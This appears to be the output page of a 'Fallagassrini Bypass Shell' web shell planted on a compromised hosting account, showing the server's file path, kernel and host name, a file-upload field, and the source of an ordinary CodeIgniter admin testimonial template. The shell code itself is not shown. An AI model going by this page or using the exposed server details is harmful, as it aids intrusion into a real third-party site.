? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/unova.in/application/views/admin/.svn/text-base/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/unova.in/application/views/admin/.svn/text-base/testimonial.php.svn-base

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<?php
$this->load->view('admin/header');
?>
    <body>
	<?php
            $this->load->view('admin/menu');
        ?>

		<div class="container_12">



         <!-- Example table -->
                <div class="module">
                	<h2><span>Testimonials</span></h2>

                    <div class="module-table-body">
                    	<form action="">
                        <table id="myTable" class="tablesorter">
                        	<thead>
                                <tr>
                                    <th style="width:5%">Sl No</th>
                                    <th style="width:15%">Person</th>
                                    <th style="width:20%">Designation</th>
                                    <th style="width:40%">Testimonial</th>
                                    <th style="width:10%">Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                             <?php
                                    $i=1;
                                    foreach($quotes as $reg)
                                    {
                             ?>
                                <tr>
                                    <td class="align-center"><?=$i++;?></td>
                                    <?php
                                        $id = $reg->getElementsByTagName( "id" );
                                        $testid = $id->item(0)->nodeValue;
                                        $names = $reg->getElementsByTagName( "author" );
                                        $name = $names->item(0)->nodeValue;
                                        $desg= $reg->getElementsByTagName( "department" );
                                        $des= $desg->item(0)->nodeValue;
                                        $quote = $reg->getElementsByTagName( "quote" );
                                        $quo = $quote->item(0)->nodeValue;
                                    ?>
                                    <td><?=$name;?></td>
                                    <td><?=$des;?></td>
                                    <td><?=$quo;?></td>
                                    <td>
                                         <?=anchor("", '<img src="'.base_url().'assets/admin/images/bin.gif"  title="Delete" width="16" height="16" align = "center" >',array('onclick'=>"return confirm('Are you sure want to delete this record?')"))?>
                                    </td>
                                </tr>
                              <?php
                                    }
                              ?>
                            </tbody>
                        </table>
                        </form>


                       <div class="pager" id="pager">
                            <form action="">
                                <div>
                                    <input class="pagesize input-short align-center" value="10" type="hidden"/>

                                </div>
                            </form>
                        </div>

                        <div style="clear: both"></div>
                     </div> <!-- End .module-table-body -->
                </div> <!-- End .module -->


                     <div class="pagination">
                		<a href="" class="button"><span><img src="<?=base_url();?>/assets/admin/images/arrow-stop-180-small.gif" height="9" width="12" alt="First" /> First</span></a>
                        <a href="" class="button"><span><img src="<?=base_url();?>/assets/admin/images/arrow-180-small.gif" height="9" width="12" alt="Previous" /> Prev</span></a>

                        <a href="" class="button"><span>Next <img src="<?=base_url();?>/assets/admin/images/arrow-000-small.gif" height="9" width="12" alt="Next" /></span></a>
                        <a href="" class="button last"><span>Last <img src="<?=base_url();?>/assets/admin/images/arrow-stop-000-small.gif" height="9" width="12" alt="Last" /></span></a>
                        <div style="clear: both;"></div>
                     </div>
            <div style="clear:both;"></div>


            </div> <!-- End .container_12 -->


<?php
$this->load->view('admin/footer');
?>

	</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net